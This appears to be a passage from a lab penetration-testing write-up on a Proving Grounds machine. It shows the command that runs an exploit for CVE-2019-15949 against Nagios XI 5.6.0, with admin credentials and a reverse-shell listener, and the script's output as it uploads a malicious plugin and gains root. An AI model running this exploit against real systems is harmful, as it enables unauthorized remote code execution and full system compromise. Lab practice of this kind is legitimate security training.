CVE-2019-15949
The target Nagios XI instance is vulnerable to CVE-2019-15949 due to its outdated version; 5.6.0
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/monitoring]
└─$ python3 CVE-2019-15949.py -k -t https://$IP/ -b /nagiosxi/ -u nagiosadmin -p admin -lh $tun0 -lp 9999
CVE-2019-15949 Nagiosxi authenticated Remote Code Execution
Login NSP Token: 3baba6dcbc089a2a0677ac741f5579dc96f720c05e8963a43798958c52cfdf4e
Logged in!
Uploading Malicious Check Ping Plugin
Upload NSP Token: 382946bbfc69188b653f427886e590471e597863f0ac0a73cdb2def5bfd94866Executing the exploit
/Play/Monitoring/3-Exploitation/attachments/{87781700-714D-4319-9FBA-45C18BBE2048}.png)
Initial Foothold established to the ubuntu(192.168.207.136) host as the root account via exploiting CVE-2019-15949.
System level compromise.